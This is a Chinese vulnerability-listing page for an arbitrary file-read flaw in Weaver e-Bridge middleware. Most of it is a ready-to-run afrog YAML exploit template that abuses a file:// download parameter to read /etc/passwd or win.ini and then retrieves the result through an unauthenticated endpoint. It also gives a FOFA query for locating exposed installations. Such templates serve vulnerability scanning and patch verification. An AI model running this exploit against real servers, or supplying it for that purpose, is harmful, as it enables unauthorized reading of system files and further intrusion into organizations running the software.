weaver-ebridge-file-read: 泛微云桥e-bridge任意文件读取漏洞

日期: 2025-09-01 | 影响软件: 泛微云桥e-bridge | POC: 已公开

漏洞描述

泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。 fofa-query: title=“泛微云桥”

PoC代码[已公开]

id: weaver-ebridge-file-read

info:
  name: 泛微云桥e-bridge任意文件读取漏洞
  author: mvhz81
  severity: critical
  description: |
    泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。
    fofa-query: title=“泛微云桥”
  reference:
    - https://mrxn.net/Infiltration/323.html

rules:
    linux0:
        request:
            method: GET
            path: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
        expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id")
        output:
            search: '"\\\"id\\\"\\:\\\"(?P<var>.+?)\\\"\\,".bsubmatch(response.body)'
            var: search["var"]
    linux1:
        request:
            method: GET
            path: /file/fileNoLogin/{{var}}
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
    windows0:
        request:
            method: GET
            path: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt
        expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id")
        output:
            search: '"\\\"id\\\"\\:\\\"(?P<var>.+?)\\\"\\,".bsubmatch(response.body)'
            var: search["var"]
    windows1:
        request:
            method: GET
            path: /file/fileNoLogin/{{var}}
        expression: response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]"))
expression: linux0() && linux1() || windows0() && windows1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/weaver-ebridge-file-read.yaml

相关漏洞推荐